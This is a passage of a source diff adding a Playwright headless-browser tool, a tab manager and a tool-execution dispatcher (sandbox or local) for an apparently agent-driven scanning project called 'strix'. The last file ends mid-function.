 import asyncio
 import base64
 import logging
 import threading
 from pathlib import Path
 from typing import Any, cast
 from playwright.async_api import Browser, BrowserContext, Page, Playwright, async_playwright
 logger = logging.getLogger(__name__)
 MAX_PAGE_SOURCE_LENGTH = 20_000
 MAX_CONSOLE_LOG_LENGTH = 30_000
 MAX_INDIVIDUAL_LOG_LENGTH = 1_000
 MAX_CONSOLE_LOGS_COUNT = 200
 MAX_JS_RESULT_LENGTH = 5_000
 class BrowserInstance:
    def __init__(self) -> None:
        self.is_running = True
        self._execution_lock = threading.Lock()
        self.playwright: Playwright | None = None
        self.browser: Browser | None = None
        self.context: BrowserContext | None = None
        self.pages: dict[str, Page] = {}
        self.current_page_id: str | None = None
        self._next_tab_id = 1
        self.console_logs: dict[str, list[dict[str, Any]]] = {}
        self._loop: asyncio.AbstractEventLoop | None = None
        self._loop_thread: threading.Thread | None = None
        self._start_event_loop()
    def _start_event_loop(self) -> None:
        def run_loop() -> None:
            self._loop = asyncio.new_event_loop()
            asyncio.set_event_loop(self._loop)
            self._loop.run_forever()
        self._loop_thread = threading.Thread(target=run_loop, daemon=True)
        self._loop_thread.start()
        while self._loop is None:
            threading.Event().wait(0.01)
    def _run_async(self, coro: Any) -> dict[str, Any]:
        if not self._loop or not self.is_running:
            raise RuntimeError("Browser instance is not running")
        future = asyncio.run_coroutine_threadsafe(coro, self._loop)
        return cast("dict[str, Any]", future.result(timeout=30))  # 30 second timeout
    async def _setup_console_logging(self, page: Page, tab_id: str) -> None:
        self.console_logs[tab_id] = []
        def handle_console(msg: Any) -> None:
            text = msg.text
            if len(text) > MAX_INDIVIDUAL_LOG_LENGTH:
                text = text[:MAX_INDIVIDUAL_LOG_LENGTH] + "... [TRUNCATED]"
            log_entry = {
                "type": msg.type,
                "text": text,
                "location": msg.location,
                "timestamp": asyncio.get_event_loop().time(),
            }
            self.console_logs[tab_id].append(log_entry)
            if len(self.console_logs[tab_id]) > MAX_CONSOLE_LOGS_COUNT:
                self.console_logs[tab_id] = self.console_logs[tab_id][-MAX_CONSOLE_LOGS_COUNT:]
        page.on("console", handle_console)
    async def _launch_browser(self, url: str | None = None) -> dict[str, Any]:
        self.playwright = await async_playwright().start()
        self.browser = await self.playwright.chromium.launch(
            headless=True,
            args=[
                "--no-sandbox",
                "--disable-dev-shm-usage",
                "--disable-gpu",
                "--disable-web-security",
                "--disable-features=VizDisplayCompositor",
            ],
        )
        self.context = await self.browser.new_context(
            viewport={"width": 1280, "height": 720},
            user_agent=(
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
            ),
        )
        page = await self.context.new_page()
        tab_id = f"tab_{self._next_tab_id}"
        self._next_tab_id += 1
        self.pages[tab_id] = page
        self.current_page_id = tab_id
        await self._setup_console_logging(page, tab_id)
        if url:
            await page.goto(url, wait_until="domcontentloaded")
        return await self._get_page_state(tab_id)
    async def _get_page_state(self, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await asyncio.sleep(2)
        screenshot_bytes = await page.screenshot(type="png", full_page=False)
        screenshot_b64 = base64.b64encode(screenshot_bytes).decode("utf-8")
        url = page.url
        title = await page.title()
        viewport = page.viewport_size
        all_tabs = {}
        for tid, tab_page in self.pages.items():
            all_tabs[tid] = {
                "url": tab_page.url,
                "title": await tab_page.title() if not tab_page.is_closed() else "Closed",
            }
        return {
            "screenshot": screenshot_b64,
            "url": url,
            "title": title,
            "viewport": viewport,
            "tab_id": tab_id,
            "all_tabs": all_tabs,
        }
    def launch(self, url: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            if self.browser is not None:
                raise ValueError("Browser is already launched")
            return self._run_async(self._launch_browser(url))
    def goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._goto(url, tab_id))
    async def _goto(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await page.goto(url, wait_until="domcontentloaded")
        return await self._get_page_state(tab_id)
    def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._click(coordinate, tab_id))
    async def _click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        try:
            x, y = map(int, coordinate.split(","))
        except ValueError as e:
            raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
        page = self.pages[tab_id]
        await page.mouse.click(x, y)
        return await self._get_page_state(tab_id)
    def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._type_text(text, tab_id))
    async def _type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await page.keyboard.type(text)
        return await self._get_page_state(tab_id)
    def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._scroll(direction, tab_id))
    async def _scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        if direction == "down":
            await page.keyboard.press("PageDown")
        elif direction == "up":
            await page.keyboard.press("PageUp")
        else:
            raise ValueError(f"Invalid scroll direction: {direction}")
        return await self._get_page_state(tab_id)
    def back(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._back(tab_id))
    async def _back(self, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await page.go_back(wait_until="domcontentloaded")
        return await self._get_page_state(tab_id)
    def forward(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._forward(tab_id))
    async def _forward(self, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await page.go_forward(wait_until="domcontentloaded")
        return await self._get_page_state(tab_id)
    def new_tab(self, url: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._new_tab(url))
    async def _new_tab(self, url: str | None = None) -> dict[str, Any]:
        if not self.context:
            raise ValueError("Browser not launched")
        page = await self.context.new_page()
        tab_id = f"tab_{self._next_tab_id}"
        self._next_tab_id += 1
        self.pages[tab_id] = page
        self.current_page_id = tab_id
        await self._setup_console_logging(page, tab_id)
        if url:
            await page.goto(url, wait_until="domcontentloaded")
        return await self._get_page_state(tab_id)
    def switch_tab(self, tab_id: str) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._switch_tab(tab_id))
    async def _switch_tab(self, tab_id: str) -> dict[str, Any]:
        if tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        self.current_page_id = tab_id
        return await self._get_page_state(tab_id)
    def close_tab(self, tab_id: str) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._close_tab(tab_id))
    async def _close_tab(self, tab_id: str) -> dict[str, Any]:
        if tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        if len(self.pages) == 1:
            raise ValueError("Cannot close the last tab")
        page = self.pages.pop(tab_id)
        await page.close()
        if tab_id in self.console_logs:
            del self.console_logs[tab_id]
        if self.current_page_id == tab_id:
            self.current_page_id = next(iter(self.pages.keys()))
        return await self._get_page_state(self.current_page_id)
    def wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._wait(duration, tab_id))
    async def _wait(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
        await asyncio.sleep(duration)
        return await self._get_page_state(tab_id)
    def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._execute_js(js_code, tab_id))
    async def _execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        try:
            result = await page.evaluate(js_code)
        except Exception as e:  # noqa: BLE001
            result = {
                "error": True,
                "error_type": type(e).__name__,
                "error_message": str(e),
            }
        result_str = str(result)
        if len(result_str) > MAX_JS_RESULT_LENGTH:
            result = result_str[:MAX_JS_RESULT_LENGTH] + "... [JS result truncated at 5k chars]"
        state = await self._get_page_state(tab_id)
        state["js_result"] = result
        return state
    def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._get_console_logs(tab_id, clear))
    async def _get_console_logs(
        self, tab_id: str | None = None, clear: bool = False
    ) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        logs = self.console_logs.get(tab_id, [])
        total_length = sum(len(str(log)) for log in logs)
        if total_length > MAX_CONSOLE_LOG_LENGTH:
            truncated_logs: list[dict[str, Any]] = []
            current_length = 0
            for log in reversed(logs):
                log_length = len(str(log))
                if current_length + log_length <= MAX_CONSOLE_LOG_LENGTH:
                    truncated_logs.insert(0, log)
                    current_length += log_length
                else:
                    break
            if len(truncated_logs) < len(logs):
                truncation_notice = {
                    "type": "info",
                    "text": (
                        f"[TRUNCATED: {len(logs) - len(truncated_logs)} older logs "
                        f"removed to stay within {MAX_CONSOLE_LOG_LENGTH} character limit]"
                    ),
                    "location": {},
                    "timestamp": 0,
                }
                truncated_logs.insert(0, truncation_notice)
            logs = truncated_logs
        if clear:
            self.console_logs[tab_id] = []
        state = await self._get_page_state(tab_id)
        state["console_logs"] = logs
        return state
    def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._view_source(tab_id))
    async def _view_source(self, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        source = await page.content()
        original_length = len(source)
        if original_length > MAX_PAGE_SOURCE_LENGTH:
            truncation_message = (
                f"\n\n<!-- [TRUNCATED: {original_length - MAX_PAGE_SOURCE_LENGTH} "
                "characters removed] -->\n\n"
            )
            available_space = MAX_PAGE_SOURCE_LENGTH - len(truncation_message)
            truncate_point = available_space // 2
            source = source[:truncate_point] + truncation_message + source[-truncate_point:]
        state = await self._get_page_state(tab_id)
        state["page_source"] = source
        return state
    def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._double_click(coordinate, tab_id))
    async def _double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        try:
            x, y = map(int, coordinate.split(","))
        except ValueError as e:
            raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
        page = self.pages[tab_id]
        await page.mouse.dblclick(x, y)
        return await self._get_page_state(tab_id)
    def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._hover(coordinate, tab_id))
    async def _hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        try:
            x, y = map(int, coordinate.split(","))
        except ValueError as e:
            raise ValueError(f"Invalid coordinate format: {coordinate}. Use 'x,y'") from e
        page = self.pages[tab_id]
        await page.mouse.move(x, y)
        return await self._get_page_state(tab_id)
    def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._press_key(key, tab_id))
    async def _press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        page = self.pages[tab_id]
        await page.keyboard.press(key)
        return await self._get_page_state(tab_id)
    def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._execution_lock:
            return self._run_async(self._save_pdf(file_path, tab_id))
    async def _save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
        if not tab_id:
            tab_id = self.current_page_id
        if not tab_id or tab_id not in self.pages:
            raise ValueError(f"Tab '{tab_id}' not found")
        if not Path(file_path).is_absolute():
            file_path = str(Path("/workspace") / file_path)
        page = self.pages[tab_id]
        await page.pdf(path=file_path)
        state = await self._get_page_state(tab_id)
        state["pdf_saved"] = file_path
        return state
    def close(self) -> None:
        with self._execution_lock:
            self.is_running = False
            if self._loop:
                asyncio.run_coroutine_threadsafe(self._close_browser(), self._loop)
                self._loop.call_soon_threadsafe(self._loop.stop)
                if self._loop_thread:
                    self._loop_thread.join(timeout=5)
    async def _close_browser(self) -> None:
        try:
            if self.browser:
                await self.browser.close()
            if self.playwright:
                await self.playwright.stop()
        except (OSError, RuntimeError) as e:
            logger.warning(f"Error closing browser: {e}")
    def is_alive(self) -> bool:
        return self.is_running and self.browser is not None and self.browser.is_connected()
--- a/strix/tools/browser/tab_manager.py
+++ b/strix/tools/browser/tab_manager.py
@@ -0,0 +1,342 @@
 import atexit
 import contextlib
 import signal
 import sys
 import threading
 from typing import Any
 from .browser_instance import BrowserInstance
 class BrowserTabManager:
    def __init__(self) -> None:
        self.browser_instance: BrowserInstance | None = None
        self._lock = threading.Lock()
        self._register_cleanup_handlers()
    def launch_browser(self, url: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is not None:
                raise ValueError("Browser is already launched")
            try:
                self.browser_instance = BrowserInstance()
                result = self.browser_instance.launch(url)
                result["message"] = "Browser launched successfully"
            except (OSError, ValueError, RuntimeError) as e:
                if self.browser_instance:
                    self.browser_instance = None
                raise RuntimeError(f"Failed to launch browser: {e}") from e
            else:
                return result
    def goto_url(self, url: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.goto(url, tab_id)
            result["message"] = f"Navigated to {url}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to navigate to URL: {e}") from e
        else:
            return result
    def click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.click(coordinate, tab_id)
            result["message"] = f"Clicked at {coordinate}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to click: {e}") from e
        else:
            return result
    def type_text(self, text: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.type_text(text, tab_id)
            result["message"] = f"Typed text: {text[:50]}{'...' if len(text) > 50 else ''}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to type text: {e}") from e
        else:
            return result
    def scroll(self, direction: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.scroll(direction, tab_id)
            result["message"] = f"Scrolled {direction}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to scroll: {e}") from e
        else:
            return result
    def back(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.back(tab_id)
            result["message"] = "Navigated back"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to go back: {e}") from e
        else:
            return result
    def forward(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.forward(tab_id)
            result["message"] = "Navigated forward"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to go forward: {e}") from e
        else:
            return result
    def new_tab(self, url: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.new_tab(url)
            result["message"] = f"Created new tab {result.get('tab_id', '')}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to create new tab: {e}") from e
        else:
            return result
    def switch_tab(self, tab_id: str) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.switch_tab(tab_id)
            result["message"] = f"Switched to tab {tab_id}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to switch tab: {e}") from e
        else:
            return result
    def close_tab(self, tab_id: str) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.close_tab(tab_id)
            result["message"] = f"Closed tab {tab_id}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to close tab: {e}") from e
        else:
            return result
    def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.wait(duration, tab_id)
            result["message"] = f"Waited {duration}s"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to wait: {e}") from e
        else:
            return result
    def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.execute_js(js_code, tab_id)
            result["message"] = "JavaScript executed successfully"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
        else:
            return result
    def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.double_click(coordinate, tab_id)
            result["message"] = f"Double clicked at {coordinate}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to double click: {e}") from e
        else:
            return result
    def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.hover(coordinate, tab_id)
            result["message"] = f"Hovered at {coordinate}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to hover: {e}") from e
        else:
            return result
    def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.press_key(key, tab_id)
            result["message"] = f"Pressed key {key}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to press key: {e}") from e
        else:
            return result
    def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.save_pdf(file_path, tab_id)
            result["message"] = f"Page saved as PDF: {file_path}"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to save PDF: {e}") from e
        else:
            return result
    def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.get_console_logs(tab_id, clear)
            action_text = "cleared and retrieved" if clear else "retrieved"
            logs = result.get("console_logs", [])
            truncated = any(log.get("text", "").startswith("[TRUNCATED:") for log in logs)
            truncated_text = " (truncated)" if truncated else ""
            result["message"] = (
                f"Console logs {action_text} for tab "
                f"{result.get('tab_id', 'current')}{truncated_text}"
            )
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to get console logs: {e}") from e
        else:
            return result
    def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
        try:
            result = self.browser_instance.view_source(tab_id)
            result["message"] = "Page source retrieved"
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to get page source: {e}") from e
        else:
            return result
    def list_tabs(self) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                return {"tabs": {}, "total_count": 0, "current_tab": None}
        try:
            tab_info = {}
            for tid, tab_page in self.browser_instance.pages.items():
                try:
                    tab_info[tid] = {
                        "url": tab_page.url,
                        "title": "Unknown" if tab_page.is_closed() else "Active",
                        "is_current": tid == self.browser_instance.current_page_id,
                    }
                except (AttributeError, RuntimeError):
                    tab_info[tid] = {
                        "url": "Unknown",
                        "title": "Closed",
                        "is_current": False,
                    }
            return {
                "tabs": tab_info,
                "total_count": len(tab_info),
                "current_tab": self.browser_instance.current_page_id,
            }
        except (OSError, ValueError, RuntimeError) as e:
            raise RuntimeError(f"Failed to list tabs: {e}") from e
    def close_browser(self) -> dict[str, Any]:
        with self._lock:
            if self.browser_instance is None:
                raise ValueError("Browser not launched")
            try:
                self.browser_instance.close()
                self.browser_instance = None
            except (OSError, ValueError, RuntimeError) as e:
                raise RuntimeError(f"Failed to close browser: {e}") from e
            else:
                return {
                    "message": "Browser closed successfully",
                    "screenshot": "",
                    "is_running": False,
                }
    def cleanup_dead_browser(self) -> None:
        with self._lock:
            if self.browser_instance and not self.browser_instance.is_alive():
                with contextlib.suppress(Exception):
                    self.browser_instance.close()
                self.browser_instance = None
    def close_all(self) -> None:
        with self._lock:
            if self.browser_instance:
                with contextlib.suppress(Exception):
                    self.browser_instance.close()
                self.browser_instance = None
    def _register_cleanup_handlers(self) -> None:
        atexit.register(self.close_all)
        signal.signal(signal.SIGTERM, self._signal_handler)
        signal.signal(signal.SIGINT, self._signal_handler)
        if hasattr(signal, "SIGHUP"):
            signal.signal(signal.SIGHUP, self._signal_handler)
    def _signal_handler(self, _signum: int, _frame: Any) -> None:
        self.close_all()
        sys.exit(0)
 _browser_tab_manager = BrowserTabManager()
 def get_browser_tab_manager() -> BrowserTabManager:
    return _browser_tab_manager
--- a/strix/tools/executor.py
+++ b/strix/tools/executor.py
@@ -0,0 +1,302 @@
 import inspect
 import os
 from typing import Any
 import httpx
 if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
    from strix.runtime import get_runtime
 from .argument_parser import convert_arguments
 from .registry import (
    get_tool_by_name,
    get_tool_names,
    needs_agent_state,
    should_execute_in_sandbox,
 )
 async def execute_tool(tool_name: str, agent_state: Any | None = None, **kwargs: Any) -> Any:
    execute_in_sandbox = should_execute_in_sandbox(tool_name)
    sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
    if execute_in_sandbox and not sandbox_mode:
        return await _execute_tool_in_sandbox(tool_name, agent_state, **kwargs)
    return await _execute_tool_locally(tool_name, agent_state, **kwargs)
 async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: Any) -> Any:
    if not hasattr(agent_state, "sandbox_id") or not agent_state.sandbox_id:
        raise ValueError("Agent state with a valid sandbox_id is required for sandbox execution.")
    if not hasattr(agent_state, "sandbox_token") or not agent_state.sandbox_token:
        raise ValueError(
            "Agent state with a valid sandbox_token is required for sandbox execution."
        )
    if (
        not hasattr(agent_state, "sandbox_info")
        or "tool_server_port" not in agent_state.sandbox_info
    ):
        raise ValueError(
            "Agent state with a valid sandbox_info containing tool_server_port is required."
        )
    runtime = get_runtime()
    tool_server_port = agent_state.sandbox_info["tool_server_port"]
    server_url = await runtime.get_sandbox_url(agent_state.sandbox_id, tool_server_port)
    request_url = f"{server_url}/execute"
    request_data = {
        "tool_name": tool_name,
        "kwargs": kwargs,
    }
    headers = {
        "Authorization": f"Bearer {agent_state.sandbox_token}",
        "Content-Type": "application/json",
    }
    async with httpx.AsyncClient() as client:
        try:
            response = await client.post(
                request_url, json=request_data, headers=headers, timeout=None
            )
            response.raise_for_status()
            response_data = response.json()
            if response_data.get("error"):
                raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
            return response_data.get("result")
        except httpx.HTTPStatusError as e:
            if e.response.status_code == 401:
                raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
            raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
        except httpx.RequestError as e:
            raise RuntimeError(f"Request error calling tool server: {e}") from e
 async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
    tool_func = get_tool_by_name(tool_name)
    if not tool_func:
        raise ValueError(f"Tool '{tool_name}' not found")
    converted_kwargs = convert_arguments(tool_func, kwargs)
    if needs_agent_state(tool_name):
        if agent_state is None:
            raise ValueError(f"Tool '{tool_name}' requires agent_state but none was provided.")
        result = tool_func(agent_state=agent_state, **converted_kwargs)
    else:
        result = tool_func(**converted_kwargs)
    return await result if inspect.isawaitable(result) else result
 def validate_tool_availability(tool_name: str | None) -> tuple[bool, str]:
    if tool_name is None:
        return False, "Tool name is missing"
    if tool_name not in get_tool_names():
        return False, f"Tool '{tool_name}' is not available"
    return True, ""
 async def execute_tool_with_validation(
    tool_name: str | None, agent_state: Any | None = None, **kwargs: Any
 ) -> Any:
    is_valid, error_msg = validate_tool_availability(tool_name)
    if not is_valid:
        return f"Error: {error_msg}"
    assert tool_name is not None
    try:
        result = await execute_tool(tool_name, agent_state, **kwargs)
    except Exception as e:  # noqa: BLE001
        error_str = str(e)
        if len(error_str) > 500:
            error_str = error_str[:500] + "... [truncated]"
        return f"Error executing {tool_name}: {error_str}"
    else:
        return result
 async def execute_tool_invocation(tool_inv: dict[str, Any], agent_state: Any | None = None) -> Any:
    tool_name = tool_inv.get("toolName")
    tool_args = tool_inv.get("args", {})
    return await execute_tool_with_validation(tool_name, agent_state, **tool_args)
 def _check_error_result(result: Any) -> tuple[bool, Any]:
    is_error = False
    error_payload: Any = None
    if (isinstance(result, dict) and "error" in result) or (
        isinstance(result, str) and result.strip().lower().startswith("error:")
    ):
        is_error = True
        error_payload = result
    return is_error, error_payload
 def _update_tracer_with_result(
    tracer: Any, execution_id: Any, is_error: bool, result: Any, error_payload: Any
 ) -> None:
    if not tracer or not execution_id:
        return
    try:
        if is_error:
            tracer.update_tool_execution(execution_id, "error", error_payload)
        else:
            tracer.update_tool_execution(execution_id, "completed", result)
    except (ConnectionError, RuntimeError) as e:
        error_msg = str(e)
        if tracer and execution_id:
            tracer.update_tool_execution(execution_id, "error", error_msg)
        raise
 def _format_tool_result(tool_name: str, result: Any) -> tuple[str, list[dict[str, Any]]]:
    images: list[dict[str, Any]] = []
    screenshot_data = extract_screenshot_from_result(result)
    if screenshot_data:
        images.append(
            {
                "type": "image_url",
                "image_url": {"url": f"data:image/png;base64,{screenshot_data}"},
            }
        )
        result_str = remove_screenshot_from_result(result)
    else:
        result_str = result
    if result_str is None:
        final_result_str = f"Tool {tool_name} executed successfully"
    else:
        final_result_str = str(result_str)
        if len(final_result_str) > 10000:
            start_part = final_result_str[:4000]
            end_part = final_result_str[-4000:]
            final_result_str = start_part + "\n\n... [middle content truncated] ...\n\n" + end_part
    observation_xml = (
        f"<tool_result>\n<tool_name>{tool_name}</tool_name>\n"
        f"<result>{final_result_str}</result>\n</tool_result>"
    )
    return observation_xml, images
 async def _execute_single_tool(
    tool_inv: dict[str, Any],
    agent_state: Any | None,
    tracer: Any | None,
    agent_id: str,
 ) -> tuple[str, list[dict[str, Any]], bool]:
    tool_name = tool_inv.get("toolName", "unknown")
    args = tool_inv.get("args", {})
    execution_id = None
    should_agent_finish = False
    if tracer:
        execution_id = tracer.log_tool_execution_start(agent_id, tool_name, args)
    try:
        result = await execute_tool_invocation(tool_inv, agent_state)
        is_error, error_payload = _check_error_result(result)
        if (
            tool_name in ("finish_scan", "agent_finish")
            and not is_error
            and isinstance(result, dict)
        ):
            if tool_name == "finish_scan":
                should_agent_finish = result.get("scan_completed", False)
            elif tool_name == "agent_finish":
                should_agent_finish = result.get("agent_completed", False)
        _update_tracer_with_result(tracer, execution_id, is_error, result, error_payload)
    except (ConnectionError, RuntimeError, ValueError, TypeError, OSError) as e:
        error_msg = str(e)
        if tracer and execution_id:
            tracer.update_tool_execution(execution_id, "error", error_msg)
        raise
    observation_xml, images = _format_tool_result(tool_name, result)
    return observation_xml, images, should_agent_finish
 def _get_tracer_and_agent_id(agent_state: Any | None) -> tuple[Any | None, str]:
    try:
        from strix.cli.tracer import get_global_tracer
        tracer = get_global_tracer()
        agent_id = agent_state.agent_id if agent_state else "unknown_agent"
    except (ImportError, AttributeError):
        tracer = None
        agent_id = "unknown_agent"
    return tracer, agent_id
 async def process_tool_invocations(
    tool_invocations: list[dict[str, Any]],
    conversation_history: list[dict[str, Any]],
    agent_state: Any | None = None,
 ) -> bool:
    observation_parts: list[str] = []
    all_images: list[dict[str, Any]] = []
    should_agent_finish = False
    tracer, agent_id = _get_tracer_and_agent_id(agent_state)
